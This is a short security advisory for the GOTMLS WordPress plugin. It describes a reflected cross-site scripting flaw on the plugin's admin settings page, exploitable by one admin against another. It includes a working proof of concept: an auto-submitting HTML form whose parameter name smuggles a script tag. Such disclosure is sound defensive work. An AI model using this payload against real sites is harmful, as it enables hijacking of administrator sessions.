The plugin does not sanitise and escape the POST data before outputting it back in attributes of an admin page, leading to a Reflected Cross-Site scripting. Due to the presence of specific parameter value, available to admin users, this can only be exploited by an admin against another admin user.
The GOTMLS_mt parameter value is retrieved when being logged in as admin and view the source code of /wp-admin/admin.php?page=GOTMLS-settings for example. Then, use the code below to XSS another admin
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_mt=dd950912e933626ba251bed092e2f9ba&scan_what=2" id="hack" method="POST">
<input type="hidden" name='x"><script>alert(/XSS/);</script>' value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>